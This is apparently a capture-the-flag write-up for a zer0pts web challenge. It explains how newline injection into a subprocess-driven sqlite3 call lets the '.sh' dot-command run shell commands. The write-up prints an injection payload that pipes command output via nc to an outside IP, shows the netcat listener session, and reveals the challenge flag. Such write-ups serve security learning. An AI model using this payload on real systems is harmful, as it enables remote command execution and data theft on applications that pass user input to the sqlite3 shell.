As above, you can see in sqlite3 executes a shell command using the .sh command.
1 2 3 4 5 6 7 8 9 10 11 12 13
defsqlite3_query(sql): p = subprocess.Popen(['sqlite3', 'database.db'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) o, e = p.communicate(sql.encode()) if e: raise Exception(e) result = [] for row in o.decode().split('\n'): if row == '': break result.append(tuple(row.split('|'))) return result
Looking at the source code, you can line jump using the \n character because using the communicate() in subporcess.Popen() in sqlite3_query().
password_hash = hashlib.sha256(password.encode()).hexdigest() result = None try: result = sqlite3_query( 'SELECT * FROM users WHERE username="{}" AND password="{}";' .format(sqlite3_escape(username), password_hash) ) except: pass
And looking at the source code in login logic, you can see that username/password value is input, the length is verified, and it is put in query statement and at this point, you can see that the username value is escaped. but, you don’t worry because treats escape characters as simple string is sqlite3.
1
SELECT * FROM users where username = "\" or 1=1 -- " and password = "pocas";
In other words, It doensn’t matter if it escaped as above.
1 2 3
SELECT * FROM users where username = "\"; .sh id|nc 141.164.52.207 2; and password = "pocas";
So, you can use shell command by doing line jumps as above and using the .sh command.
root@py:~# nc -lvnp 2 Listening on 0.0.0.0 2 Connection received on 165.227.180.221 38761 id uid=1000(app) gid=1000(app) cat templates/index.html <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Welcome</title> </head>
<body> <h1>Welcome, {{name}}!</h1> {% if name == 'admin' %} <p>zer0pts{w0w_d1d_u_cr4ck_SHA256_0f_my_p4$$w0rd?}</p> {% else %} <p>No flag for you :(</p> {% endif %} </body> </html>
Final, I pass the shell using e option about nc and read index.html and saw the flag.
1
FLAG : zer0pts{w0w_d1d_u_cr4ck_SHA256_0f_my_p4$$w0rd?}